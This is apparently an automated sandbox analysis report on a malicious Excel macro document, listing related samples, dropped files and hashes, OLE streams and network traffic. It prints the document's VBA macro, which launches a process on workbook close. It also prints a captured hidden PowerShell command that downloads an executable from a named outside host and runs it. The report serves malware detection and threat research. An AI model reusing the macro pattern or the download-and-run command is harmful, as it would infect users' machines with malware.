                                              sparepartiran.com | 633307.xls | malicious | 162.223.88.131
                                              sparepartiran.com | SecuriteInfo.com.Exploit.Siggen3.1570.13842.xls | malicious | 162.223.88.131
                                              sparepartiran.com | 4640578.xls | malicious | 162.223.88.131
                                              sparepartiran.com | 6021557.xls | malicious | 162.223.88.131
                                              sparepartiran.com | INQUIRY ON PRICE LIST.xlsm | malicious | 162.223.88.131
                                              sparepartiran.com | ORDER-45103.xls | malicious | 162.223.88.131
                                              sparepartiran.com | yp7kw0211047.xls | malicious | 162.223.88.131
                                              sparepartiran.com | Debt Statement.xls | malicious | 162.223.88.131
                                              sparepartiran.com | SD-1061.xls | malicious | 162.223.88.131
                                              sparepartiran.com | NEW ORDER.xls | malicious | 162.223.88.131

                                              ASN

                                              Match | Associated Sample Name / URL | Detection | Context
                                              COLOUPUS | Hm0L8.xls | malicious | 162.223.88.131
                                              COLOUPUS | 5080132.xls | malicious | 162.223.88.131
                                              COLOUPUS | Ref 0047.xls | malicious | 162.223.88.131
                                              COLOUPUS | 633307.xls | malicious | 162.223.88.131
                                              COLOUPUS | SecuriteInfo.com.Exploit.Siggen3.1570.13842.xls | malicious | 162.223.88.131
                                              COLOUPUS | 4640578.xls | malicious | 162.223.88.131
                                              COLOUPUS | 6021557.xls | malicious | 162.223.88.131
                                              COLOUPUS | INQUIRY ON PRICE LIST.xlsm | malicious | 162.223.88.131
                                              COLOUPUS | ORDER-45103.xls | malicious | 162.223.88.131
                                              COLOUPUS | yp7kw0211047.xls | malicious | 162.223.88.131
                                              COLOUPUS | Debt Statement.xls | malicious | 162.223.88.131
                                              COLOUPUS | SD-1061.xls | malicious | 162.223.88.131
                                              COLOUPUS | NEW ORDER.xls | malicious | 162.223.88.131

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\Public\oftmhayq.exe
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):552960
                                              Entropy (8bit):7.182147023805618
                                              Encrypted:false
                                              SSDEEP:12288:MiUO3Iy0AZNVNpiWbYOoa09FQFFFFFFFFFFFFFFFFFFFFFRYH8txxxxxxxxxxxxZ:InULziIYpaIFq
                                              MD5:7E26E87AB642008D934824D509559859
                                              SHA1:3D4DC73FEE1B191C2B942E28920C37C82D38B0ED
                                              SHA-256:3176528C561817095AF859F4809A2091F8557F93C27A0FE32EE71C8FC3B71F33
                                              SHA-512:C51D64487F852B3D24C4F6B6C2EB79DEAC9394A607BE1B8287BD087398B17B5403DDACE34EB46FD0A5807E044ECC6869213CCEF9EEDA4604D7A1DF711B691A2C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oftmhayq.exe.log
                                              Process:C:\Users\Public\oftmhayq.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1391
                                              Entropy (8bit):5.344111348947579
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4xLE4qE4W:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzh
                                              MD5:E87C60A24438CC611338EA5ACB433A0A
                                              SHA1:E0C6A7D5CFE32BB2178E71DEE79971A51697B7DD
                                              SHA-256:80DAB47D7A9E233A692D10ACAF5793E34911836D36DB2E11BB7C5D42DE39782A
                                              SHA-512:3DBD6773153DC9D05558ED491A92C9B4B72D594263D7BD2D06BDDCF09BE55477D35041145219A5E9A46B38575E5B60DA91C6870B2CA29A83388695AD389B8EBF
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\AC884895-1FFB-4FFD-9AEA-0EAADDCF8F32
                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):129952
                                              Entropy (8bit):5.378326234389065
                                              Encrypted:false
                                              SSDEEP:1536:mcQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:0mQ9DQW+zBX8u
                                              MD5:DF0C880894C2F78E9AD029585FF4FCA7
                                              SHA1:77216174BF47B52075FDB840151377A6682CD90E
                                              SHA-256:284F18BFBB35013569813423ECE460368B4AE64FD5631B444BB8B82F7FC72BD8
                                              SHA-512:2058245A6AFF413CC97265F041A3690D5CE19F3522320ECD468602CA5BC35393AEE9C925065111629180275581B808B63D7D3B42207DDE95F2A98BF1924D16E0
                                              Malicious:false
                                              Reputation:low
                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-27T10:36:40">.. Build: 16.0.13518.30530-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):0.9260988789684415
                                              Encrypted:false
                                              SSDEEP:3:Nlllulb/lj:NllUb/l
                                              MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                              SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                              SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                              SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview: @...e................................................@..........
                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgkruib0.ygj.psm1
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview: 1
                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eynwfcx2.3ju.psm1
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview: 1
                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljxb34qx.vzy.ps1
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview: 1
                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ryxuahqv.3dg.ps1
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview: 1
                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
                                              Process:C:\Users\Public\oftmhayq.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):552960
                                              Entropy (8bit):7.182147023805618
                                              Encrypted:false
                                              SSDEEP:12288:MiUO3Iy0AZNVNpiWbYOoa09FQFFFFFFFFFFFFFFFFFFFFFRYH8txxxxxxxxxxxxZ:InULziIYpaIFq
                                              MD5:7E26E87AB642008D934824D509559859
                                              SHA1:3D4DC73FEE1B191C2B942E28920C37C82D38B0ED
                                              SHA-256:3176528C561817095AF859F4809A2091F8557F93C27A0FE32EE71C8FC3B71F33
                                              SHA-512:C51D64487F852B3D24C4F6B6C2EB79DEAC9394A607BE1B8287BD087398B17B5403DDACE34EB46FD0A5807E044ECC6869213CCEF9EEDA4604D7A1DF711B691A2C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              C:\Users\user\Documents\20201127\PowerShell_transcript.849224.0kLC5vT1.20201127113806.txt
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):3951
                                              Entropy (8bit):5.421598276555511
                                              Encrypted:false
                                              SSDEEP:96:BZIh5N9I1qDo1ZrSieXmZah5N9I1qDo1ZIseX2eXSrEzyeXSrEzyeXSrEzTZ7:leXgeX2eX8eX8eXn
                                              MD5:5157FE1088C77BC92F20BF23DB040ACB
                                              SHA1:108D7C64C82A178B2E12F50983FC746C8C008621
                                              SHA-256:DE128F5C758AE0CDE62A7074EBBBECFE96BACA2D30503A2CF49B54CD6D026309
                                              SHA-512:91BD8AC33B8459D11CDBB63EA7F4083395EE152671CA459B58560D2AE4ABDA4D4AC8752D64EDB05FC05F69C9F36153B5DCB0AEDC2A87ECEF04F615C3028F40C8
                                              Malicious:false
                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20201127113806..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 849224 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath C:\Users\Public\oftmhayq.exe}..Process ID: 5184..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201127113806..**********************..PS> & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath C:\Users\Public\oftmhayq.
                                              C:\Users\user\Documents\20201127\PowerShell_transcript.849224.b3BihSD7.20201127113805.txt
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1219
                                              Entropy (8bit):5.282450136999881
                                              Encrypted:false
                                              SSDEEP:24:BxSAsxvBn5x2DOXiRbWoPuv18WMHjeTKKjX4CIym1ZJXQaPuv1WnxSAZI:BZwvh5oOqioPuv1HMqDYB1ZLPuv14ZZI
                                              MD5:09AC619D5065DA9F92352D74207C3020
                                              SHA1:FAF52D46822C6571C60E32E0C79D1D6947BCA100
                                              SHA-256:7567B37EB56FECE10EC3C5924D2EF4576ABF88080D9C09439B44104FBB182E5B
                                              SHA-512:FB281DD2CA0977C9B659171CE9DC89A957F098AF7D3A8537A1C54D30F94448609C2319D9BE6A1FEA042417CE15CA0FE4D3E286C1FC0CF0CC9FAAFEF41F95E54E
                                              Malicious:false
                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20201127113806..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 849224 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath C:\Users\Public\oftmhayq.exe}..Process ID: 5164..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201127113806..**********************..PS> & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath C:\Users\Public\oftmhayq.

                                              Static File Info

                                              General

                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Dell, Last Saved By: Dell, Create Time/Date: Fri Nov 27 09:06:11 2020, Last Saved Time/Date: Fri Nov 27 09:06:12 2020, Security: 0
                                              Entropy (8bit):7.862065005946057
                                              TrID:
                                              • Microsoft Excel sheet (30009/1) 47.99%
                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                              File name:5901777.xls
                                              File size:208384
                                              MD5:899e5af08f0794f0131adbf03f841045
                                              SHA1:242508434986d472b0b83387ec8d5d33888baa29
                                              SHA256:74b115a8b1f4e18d26b092dc965b60ad94dba931591d9913db219823d294904a
                                              SHA512:e43293d7d37a19a7564e076fdb55ea9594758246504cbd504653f8b3c60a94806313145c13366f21bcc85b98c407262f63bfdb25511738899fcef4cb4cf665a2
                                              SSDEEP:6144:gk3hOdsylKlgryzc4bNhZF+E+W2knu17K4g62FpqDIWPIVirJNl15bdVwHmGRl:61+4v2FpqDAcrJN1bbwGGR

                                              File Icon

                                              Icon Hash:74ecd4c6c3c6c4d8

                                              Static OLE Info

                                              General

                                              Document Type:OLE
                                              Number of OLE Files:1

                                              OLE File "5901777.xls"

                                              Indicators

                                              Has Summary Info:True
                                              Application Name:unknown
                                              Encrypted Document:False
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:True
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:True

                                              Summary

                                              Code Page:1252
                                              Author:Dell
                                              Last Saved By:Dell
                                              Create Time:2020-11-27 09:06:11
                                              Last Saved Time:2020-11-27 09:06:12
                                              Security:0

                                              Document Summary

                                              Document Code Page:1252
                                              Thumbnail Scaling Desired:False
                                              Contains Dirty Links:False
                                              Shared Document:False
                                              Changed Hyperlinks:False
                                              Application Version:983040

                                              Streams with VBA

                                              VBA File Name: ThisWorkbook.cls, Stream Size: 742
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                              VBA File Name:ThisWorkbook.cls
                                              Stream Size:742

                                              VBA Code Keywords

                                              Keyword
                                              .ShrinkToFit
                                              .TintAndShade
                                              lctheufps
                                              VB_Name
                                              VB_Creatable
                                              xlCenter
                                              lctheufps.Create(yqukhazhshmodqbmnkwuescdsportzmbady)
                                              "ThisWorkbook"
                                              VB_Exposed
                                              .VerticalAlignment
                                              .WrapText
                                              .Orientation
                                              Selection.Borders(xlDiagonalUp).LineStyle
                                              .MergeCells
                                              xlThin
                                              psisbdmpm
                                              Workbook_BeforeClose(Cancel
                                              VB_Customizable
                                              .ColorIndex
                                              .AddIndent
                                              Selection.Font.Italic
                                              .Weight
                                              Selection.Font.Bold
                                              xlContext
                                              yqukhazhshmodqbmnkwuescdsportzmbady
                                              .HorizontalAlignment
                                              xlBottom
                                              .LineStyle
                                              VB_TemplateDerived
                                              xlNone
                                              xlUnderlineStyleSingle
                                              Selection.Borders(xlDiagonalDown).LineStyle
                                              Selection.Borders(xlEdgeTop)
                                              Selection
                                              False
                                              Selection.Borders(xlEdgeLeft)
                                              .IndentLevel
                                              Attribute
                                              Selection.Font.Underline
                                              Private
                                              .ReadingOrder
                                              xlContinuous
                                              VB_PredeclaredId
                                              VB_GlobalNameSpace
                                              VB_Base
                                              Boolean)
                                              VBA Code
                                              Attribute VB_Name = "ThisWorkbook"
                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = False
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                              Range("l1:x22").Select
                                              Selection.Borders(xlDiagonalDown).LineStyle = xlNone
                                              Selection.Borders(xlDiagonalUp).LineStyle = xlNone
                                              With Selection.Borders(xlEdgeLeft)
                                              .LineStyle = xlContinuous
                                              .ColorIndex = 0
                                              .TintAndShade = 0
                                              .Weight = xlThin
                                              End With
                                              Range("A1:J15").Select
                                              Selection.Font.Bold = True
                                              Selection.Font.Italic = True
                                              Selection.Font.Underline = xlUnderlineStyleSingle
                                              yqukhazhshmodqbmnkwuescdsportzmbady = Range("A3").Value
                                              With Selection
                                              .HorizontalAlignment = xlCenter
                                              .VerticalAlignment = xlBottom
                                              .WrapText = False
                                              .Orientation = 0
                                              .AddIndent = False
                                              .IndentLevel = 0
                                              .ShrinkToFit = False
                                              .ReadingOrder = xlContext
                                              .MergeCells = False
                                              End With
                                              Set lctheufps  = CreateObject(Range("A4").Value)
                                              Dim psisbdmpm
                                              Range("M5").Select
                                              psisbdmpm = lctheufps.Create(yqukhazhshmodqbmnkwuescdsportzmbady)
                                              With Selection.Borders(xlEdgeTop)
                                              .LineStyle = xlContinuous
                                              .ColorIndex = 0
                                              psisbdmpm = lctheufps.Create(yqukhazhshmodqbmnkwuescdsportzmbady)
                                              .TintAndShade = 0
                                              .Weight = xlThin
                                              End With
                                              End sub
                                              VBA File Name: oldgcaiba.cls, Stream Size: 172
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/oldgcaiba
                                              VBA File Name:oldgcaiba.cls
                                              Stream Size:172

                                              VBA Code Keywords

                                              Keyword
                                              "oldgcaiba"
                                              False
                                              VB_Exposed
                                              Attribute
                                              VB_Name
                                              VB_Creatable
                                              VB_PredeclaredId
                                              VB_GlobalNameSpace
                                              VB_Base
                                              VB_Customizable
                                              VB_TemplateDerived
                                              VBA Code
                                              Attribute VB_Name = "oldgcaiba"
                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = False
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True

                                              Streams

                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 107
                                              General
                                              Stream Path:\x1CompObj
                                              File Type:data
                                              Stream Size:107
                                              Entropy:4.18482950044
                                              Base64 Encoded:True
                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 228
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
                                              File Type:data
                                              Stream Size:228
                                              Entropy:2.83826051843
                                              Base64 Encoded:False
                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 176
                                              General
                                              Stream Path:\x5SummaryInformation
                                              File Type:data
                                              Stream Size:176
                                              Entropy:3.03638398782
                                              Base64 Encoded:False
                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 200639
                                              General
                                              Stream Path:Workbook
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Stream Size:200639
                                              Entropy:7.92744162749
                                              Base64 Encoded:True
                                              Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 478
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                              File Type:ASCII text, with CRLF line terminators
                                              Stream Size:478
                                              Entropy:5.17133809761
                                              Base64 Encoded:True
                                              Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 71
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                              File Type:data
                                              Stream Size:71
                                              Entropy:3.1232478398
                                              Base64 Encoded:False
                                              Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                              File Type:ISO-8859 text, with no line terminators
                                              Stream Size:7
                                              Entropy:1.84237099318
                                              Base64 Encoded:False
                                              Data ASCII:. a . . . . .
                                              Data Raw:cc 61 ff ff 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 224
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                              File Type:data
                                              Stream Size:224
                                              Entropy:5.5463550152
                                              Base64 Encoded:False

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                              Nov 27, 2020 11:38:09.084963083 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.085015059 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.087742090 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.087779045 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.087816954 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.087855101 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.087865114 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.088689089 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.137701035 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137737989 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137759924 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137780905 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137788057 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.137809038 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137818098 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.137830019 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137851000 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137851954 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.137871981 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137881994 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.137900114 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.138164997 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.138186932 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.138206959 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.138211966 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.138227940 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.138241053 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.138268948 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.138952017 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.138974905 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.138994932 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.138998032 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.139018059 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.139019966 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.139033079 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.139053106 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.139137983 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.139163971 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.139185905 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.139199972 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.139205933 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.139224052 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.139257908 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.198826075 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.198895931 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.198934078 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.198977947 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.199078083 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.199240923 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.200598955 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.200645924 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.200694084 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.200733900 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.200747967 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.200855970 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.203705072 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.203763962 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.203830957 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.203871012 CET8049743162.223.88.131192.168.2.3
